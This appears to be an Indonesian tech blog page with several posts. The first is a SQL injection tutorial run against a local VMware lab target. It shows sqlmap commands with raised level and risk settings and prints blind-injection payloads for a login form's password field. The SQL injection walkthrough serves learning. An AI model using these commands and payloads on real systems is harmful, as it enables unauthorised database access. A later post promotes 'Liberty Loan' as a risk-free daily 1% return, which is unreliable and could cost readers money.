Tutorial SQL Injection Level 4

Tutorial SQL Injection Level 4 - Kali ini saya akan memberikan sedikit pelajaran mengenai SQL Injection level 4. Pada tutorial kali ini, saya tidak menggunakan live target, karena saya rasa itu bersifat merusak. Sehingga saya coba metode ini di localhost dengan bantuan VMware. :D

Bahan - Bahan Yang Akan Kita Gunakan Pada  Tutorial SQL Injection Level 4 :

1. Mozilla Firefox *
2. Tamper Data *
3. SQLmap * 

1. Menguji vulnerability

Kali ini, vmware saya telah berjalan dan memiliki ip address 172.16.33.131. Saya buka firefox, kemudian saya masukan IP address 172.16.33.131 pada address bar.

  Setelah Itu Test Login Dengan :

Username : admin Password : admin

Kemudian Hasil-nya :

Kita berada di halaman checklogin.php . Disini tidak ada parameter untuk diuji. Mungkin saya bisa menguji data yang dikirim ke server. Saya kembali lagi ke halaman login. Dengan Username Dan Password : 

Username : admin Password : '

Dan Hasilnya :

Kelihatannya website ini Vulnerable . Namun tetap tidak ada parameter. Sehingga dapat disimpulkan bahwa vulnerability bukan terletak pada parameter, melainkan DATA. Untuk mengecek data yang dikirim ke server, saya gunakan Tamper Data .

2. Tamper Data In Action 

Jika anda belum memiliki tamper data, anda bisa Mendownloadnya Lewat link ini >>. Namun add-on ini hanya dapat digunakan di Mozilla Firefox. Dan tidak dapat digunakan di Browser lain.

Setelah menginstall, tamper data dapat diaktifkan di Tools --> Tamper Data

  

Kembali ke halaman login Dengan Username & Password : 

Username : admin Password : 123

Maka tamper data akan mengambil setiap data yang terjadi selama proses transfer data dari client ke server, maupun sebaliknya.

OK. Saya temukan POSTDATA=myusername=admin&mypassword=123&Submit=Login. Ternyata ada 3 data di sini. yaitu myusername, mypassword, dan Submit. Dan kita telah mengetahui bahwa data password vulnerable. Selanjutnya kita akan gunakan SQLmap untuk menguji database menggunakan informasi yang telah kita dapatkan.

3. SQLmap in Attack

  

red-dragon [~] >> cd /pentest/database/sqlmap/                                                           red-dragon [/pentest/database/sqlmap] >> python sqlmap.py -u http://172.16.33.131/checklogin.php --data="POSTDATA=myusername=admin&mypassword=123&Submit=Login" -p mypassword --flush-session

Keterangan :

-u = url [Pesan error muncul pada halaman checklogin.php]

--data = [Kali ini kita akan memberikan data pada server dengan cara tampering / menyuap]

-p = parameter [Parameter yang vulnerable adalah mypassword

--flush-session = Bagian ini tidak masalah jika tidak disertakan.

Muncul pertanyaan :

parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

Kemudian muncul lagi :

sqlmap got a 302 redirect to 'http://172.16.33.131:80/login_success.php'. Do you want to follow? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

dan berujung pada CRITICAL :

[CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. Please, consider usage of tampering scripts as your target might filter the queries. Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user'smanual for details 

4. Over

Saya coba naikan level dan risk pada testing SQLmap menjadi 5.  

red-dragon [/pentest/database/sqlmap] >> python sqlmap.py -u http://172.16.33.131/checklogin.php --data="POSTDATA=myusername=admin&mypassword=123&Submit=Login" -p mypassword --level=5 --risk=5

Kemudian muncul lagi:

sqlmap got a 302 redirect to 'http://172.16.33.131:80/login_success.php'. Do you want to follow? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

Dan muncul pesan yang membahagiakan:

POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 

Saya jawab "n", kemudian "enter".

Dan payload untuk website ini adalah: 

Place: POST Parameter: mypassword Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: POSTDATA=myusername=admin&mypassword=-3973' OR (5599=5599) AND 'eHOv'='eHOv&Submit=Login Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: POSTDATA=myusername=admin&mypassword=123' AND 2246=BENCHMARK(5000000,MD5(0x77544b50)) AND 'bGtM'='bGtM&Submit=Login

Read More

Troubleshooting CD/DVD Rom

CD/DVD Rom tidak mau membaca

Bersihkan head CD/DVD Rom

cd cleaner

Seringkali saya mendapati pertanyaan,  CD/DVD Rom saya gak bisa baca ? padahal saya baru beli 2-3 bulan lalu, pertanyaan pertama yang saya ajukan adalah apakah headnya pernah dibersihkan ?, emang perlu dibersihkan ya ?, ya perlu lah. Head pada CD/DVD Rom memiliki fungsi yang sama seperti mata, jika head/mata kotor maka penglihatan kita akan buram atau tidak jelas, begitu juga head CD/DVD Rom, sinar laser yang dihasilkan oleh head dapat terhalang oleh debu yang mengakibatkan pembacaan CD/DVD jadi tidak lancar. Solusinya, beli pembersih CD/DVD Rom, biasanya dilengkapi dengan alkohol, cara pakainya gampang, kalau tidak bisa boleh komentar dibawah.

Bersihkan CD/DVD

Seringkali saya dapati permukaan CD/DVD terdapat lemak atau bekas cetakan tangan, hal ini sangat membuat CD/DVD Rom akan cepat rusak, karena head akan dipaksa untuk membaca CD/DVD, oleh karena itu sebelum CD/DVD dimasukkan kedalam drive, pastikan bebas kotor dan lemak. Untuk membersihkan lemak atau bekas cetakan tangan dapat menggunakan pembersih cd yang banyak dijual di toko komputer.

CD/DVD Rom tidak mau eject

eject cd rom

Pernah mengalami CD/DVD macet tidak mau dikeluarkan dari dalam drive ?, tentu dong, kalau ini terjadi, gampang aja, ambil penjepit kertas, kemudian sambil menekan tombol eject, masuk dan tekan lubang kecil yang terdapat di drive CD/DVD rom.

CD/DVD Rom tidak terdetek

Permasalahan yang sering saya temui, yang ini relatif mudah, pertama cek apakah lampu indikator pada CD/DVD Rom menyala, jika tidak berarti adalah masalah power, coba ganti power yang terhubung ke CD/DVD Rom dengan kabel power yang lain, tentunya harus buka casing dulu. Jika sudah nyala namun tidak terdeteksi langkah selanjutnya adalah mengecek kabel IDE, kabel ukuran flexi ukuran besar yang menempel disamping kabel power, coba ganti dengan kabel IDE yang lain, biasanya dengan menggunakan dua langkah ini CD/DVD Rom terdeteksi kembali, jika tidak maka ada kerusakan hardware dan kamu harus beli yang baru hhe.

Read More

Memperbaiki error NTLDR is missing

Artikel ini terinspirasi ketika saya memperbaiki laptop kedua orang kawan saya, sebut saja namanya si fulan, “kin, laptop tiba-tiba muncul NTLD is missing, padahal gak diapa-apain, muncul aja tiba-tiba”, “kok bisa”, jawab saya, “kalau tahu gak bakal tanya sama kinta :p “, “huff, capek dech”.

Mengalami hal yang serupa juga kawan ?, berikut solusinya.

Pesan error NTLDR

Saya pernah mendapati beberapa pesan error NTLDR, diantaranya :

“NTLDR is missing
Press any key to restart”

“NTLDR is missing
Press Ctrl Alt Del to restart”

“Boot: Couldn’t find NTLDR
Please insert another disk”

Dan yang paling sering saya dapati adalah yang nomor 2, ”NTLDR is missing, Press Ctrl + Alt + Del to restart”. Pesan error NTLDR terjadi setelah proses POST (Power On Self Test) selesai atau setelah proses pengecekan hardware.

Penyebab munculnya pesan error NTLDR is missing

Berdasarkan pengalaman ada beberapa sebab mengapa pesan error NTLDR muncul, diantara :

1. PC melakukan boot pada USB,CD atau Hard Drive yang tidak memiliki boot sector.
2. Sistem Windows mengalami corrupt.
3. Ada kesalahan pada konfigurasi boot file.
4. Kabel IDE/Sata rusak, sehingga data tidak mengalir dengan sempurna.
5. Proses upgrade windows tidak sempurna.

Solusi memperbaiki pesan error NTLDR is missing

1. Jika beruntung, cukup merestart PC/Laptop pesan NTLR is missing dapat hilang.
2. Periksa apakah ada USB, CD atau Media lain yang terhubung ke PC/Laptop, jika ada cabut, hal ini untuk mencegah boot dari media tersebut.
3. Periksa BIOS, apakah boot pertama dari Hard Drive yang memiliki boot sector atau terinstall windows didalamnya.
4. Ketiga cara diatas adalah P3Kom saya dalam memperbaiki error NTLDR, jika tidak bisa maka saya memakai cara yang selalu ampuh, berikut tahapannya.

Cara ampuh memperbaiki pesan NTLR is missing

1. Persiapkan CD Windows dan masukkan ke dalam CD/DVD Drive
2. Restart PC/Laptop dan buat agar boot pertama dari CD/DVD Drive.
3. Tekan enter pada pesan “press anykey to boot from CD”.
4. Setelah masuk ke Setup Menu, tekan ”R” untuk masuk ke repair command line.
5. Selanjutnya akan ditanya, dimana letak sistem windowsnya, muncul pilihan angka, pilih angka yang terdapat sistem windows, contoh : jika di drive C maka pilih angka 1.
6. Selanjutnya akan ditanya password administrator, ketikkan dan enter.
7. Sekarang kita akan mengcopy file NTLDR & NTDETECT.com kedalam sistem. Misal CD/DVD drive kamu adalah drive D, maka perintahnya

Copy d:\i38\ntldr c:\
Copy d:\i38\ntdetect.com c:\

• Jika berhasil maka akan ada tulisan “2 file copied”.
• Restart dan pilih boot dari Harddisk pertama.
• Voila PC/Laptop kamu sudah sehat kembali.

Read More

Tingkatan Hacker Versi Marc Rogers

Setelah sobat membaca artikel-artikel saya yang lalu mengenai khususnyatingkatan/hierarki hacker, kali ini saya akan menambahkan sedikit pengetahuan buat sobat tentang tingkatan-tingkatan menurut Marc Roger. Menurut Marc Roger, Hacker dapat di-identifikasi menjadi beberapa tingkatan yaitu:

• Tool Kids/Newbies, orang-orang yang baru belajar aktifitas hacking, namun kemampuan komputer serta teknik pemrograman relatif terbatas dan hanya baru bisa membuat program-program dasar. Aktifitas hacking yang dilakukan umumnya menggunakan bantuan aplikasi yang terdapat di internet hingga tidak murni mengandalkan kemampuan individunya.

• CyberPunk, Orang-orang yang memiliki pengetahuan dan teknik komputer yang lebih tinggi dibandingkan Newbies. Mereka sudah mampu memahami karakteristik dari sistem jaringan ataupun sistem yang sedang mereka serang. Pengetahuan mereka tentang bahasa pemrograman cukup handal, karena mampu mendefinisikan hingga karakteristik umumnya. Dengan kemampuannya ini, dia sudah mampu menciptakan alat bantu infiltrasi sendiri, hingga tidak lagi menggunakan program-program bantu yang tersedia di internet. Aktifitas-aktifitas yang dilakukan memiliki kecenderungan untuk kriminal seperti defacing web, carding, ataupun spamming.

• Internals, Orang-orang yang masih bergabung ataupun pernah (mantan) bekerja dengan perusahaan TI. Dengan kemampuan komputer dan programming yang handal. Dan melakukan berbagai aktivitas hacking dengan mengandalkan berbagai kombinasi sumber daya internal maupun eksternal yang ada untuk berbagai tujuan. Contohnya, pelanggaran yang paling sering dilakukan adalah breaking over previledge activity, yaitu segala aktifitas yang melanggar batasan-batasan hak yang dimiliki.

• Coders, Golongan ini dikenal juga sebagai resources, yaitu orang-orang yang menjual berbagai informasi yang ada di internet ke pihak-pihak yang membutuhkan. Kemampuan programming dan teknisnya sangat handal dan kelompok ini memperoleh berbagai data ataupun informasi yang dapat dijual. Coders juga membantu membuat berbagai aplikasi bantu hacking yang dibutuhkan oleh para hacker ataupun attacker/cracker yang membutuhkan.

• Old Guard Hackers (Idealism Gate Keepers), para hacker sejati yang murni melakukan aktifitas-aktifitas hacking dalam rangka untuk tujuan ilmiah dan kebaikan semua pihak. Jumlah golongan ini relatif sangat sedikit, karena idealisme yang dijunjung memaksa mereka untuk menggunakan kode etik yang dijunjung tinggi oleh para hacker, yaitu kemampuan di atas segalanya.

• Professional Criminals, para attacker/cracker yang bergerak atas nama kelompok ataupun individu dan melakukan berbagai aktifitas cyber crimesebagai sumber kehidupan utamanya. Kemampuan yang dimiliki oleh kelompok ini sangat sempurna karena mengkombinasikan berbagai piranti keras dan pengetahuan programming yang bisa diandalkan dengan dibantu data/informasi yang diperoleh dari Coders. Aktifitas kejahatan yang dilakukan tidak lagi dalam kelas CyberPunk yang lebih banyak pada target individu, namun justru pada kalangan korporat dengan jalan merampok dana yang tersedia dengan melakukan transfer secara tersembunyi

• Cyber Terrorist, sekelompok orang atau individu yang bertindak atas dasar sentimen kepada suatu kelompok atau pihak tertentu, dan melakukan berbagai aktifitas yang bertujuan untuk menunjukkan eksistensi mereka pada lingkungan dunia. Tingkatan kemampuan yang dimiliki kelompok ini adalah yang tertinggi karena menggabungkan berbagai sumber daya yang ada, level kemampuan, bahkan menggunakan sarana prasarana bantuan dari pihak sponsor yang membantu seperti satelit telekomunikasi.

Semoga sedikit pengetahuan ini dapat menambah wawasan bagi sobat-sobat yang ingin mengetahui lebih dalam seluk-beluk dunia hacker. Semoga bermanfaat! :-)

Read More

Dollar Gratis Tanpa Henti Dari Liberty Loan

Halo sobat blogger, ada bisnis online yang sangat menarik nih. Bisnis onlineyang memberikan dollar cuma-cuma ke kita tanpa kita melakukan apapun. Hanya cukup mendaftarkan diri saja dan kita akan mendapatkan $1. Mungkin sudah banyak sobat blogger yang mendaftarkan diri. Bagi sobat yang belum, cepat daftar sob!

Liberty Loan -sistem kerja bisnis ini seperti ini sob, kita akan mendapatkan bonus $1 setelah kita bergabung. Tapi dollar tersebut tidak bisa langsung kita ambil melainkan profitnya yang bisa kita ambil yaitu sebesar 1% perhari atau $0,01.Profit tersebut mengalir terus tanpa henti ke akun kita setiap harinya. Sangat bebas dari resiko kalo kita bergabung ke Liberty Loan. Dan jika sobat ingin hasil yang lebih cepat, sobat dapat menginvestasikan uang kita minimal $1 dollar melalui LibertyReserve. Kita bisa payout kapanpun dan berapapun  sob, prosesnya juga sangat cepat. Hal ini sudah saya buktikan sendiri sob, baru tadi malam saya coba payout sebesar $0,03 dan langsung masuk ke akunLibertyReserve saya.

Nah gimana sob? hanya bermodalkan LibertyReserve, dollar akan mengalir terus ke akun kita dari Liberty Loan. Kalo ingin mendaftar, klik link dibawah ini sob. :)

Read More

Trik Download Super Cepat! IDM Lewat!

Cara ini sebenarnya secara tidak sengaja saya mengetahuinya sewaktu download film beberapa hari yang lalu dengan ukuran file ratusan Mb. Ya.. memang biasanya saya kalau download menggunakan download accelelator atau internet download manager memang bisa cepat. Dikarenakan IDM saya sering error sewaktu download, akhirnya mencoba menggunakan cara lain, dan cara ini sangat berhasil!

Saya menggunakan DownThemAll!. Anda tahu DownThemAll!? Ini adalah fasilitas dari browser mozilla yang memberikan download manager berkekuatan 3000 tenaga kuda, hehehehe....

Coba Anda lihat perbedaan sewaktu saya menggunakan IDM dengan menggunakan DownThemAll!.

Sewaktu menggunakan IDM

Sewaktu menggunakan DownThemAll!

Anda lihat perbedaan kecepatan dari kedua download manager diatas? Hingga 3 x lipat lebih cepat dari IDM. SO???? Download disini

https://addons.mozilla.org/en-US/firefox/addon/201/

Cara pasangya seperti masang Add-on mozilla pada umumnya. Download dulu di https://addons.mozilla.org/en-US/firefox/addon/201/

Setelah sukses download, maka secara otomati pop up akan keluar yang berisi hasil downloadan tsb. Klik "Install", lalu setelah proses isntall selesai, klik "Restart" yang ada di jendela pop up tsb. Dgn demikian DownThemAll! secara otomatis masuk tool download.

Lihat cara download menggunakan DownThemAll!berikut:

Di sable dulu IDM nya ya... jika sudah lalu klik link yang mau di download. Akan keluar seperti ini

Pilih no.2 dan Klik OK.

Pada pilihan Save files in klik gambar folder orange sebelah kanan dan pilih dimana Anda akan menyimpan hasil downloadan nanti lalu klik Start!

Diatas saya contohkan menympan di folder Software lalu klik OK. Tinggal nunggu proses download nya.

Read More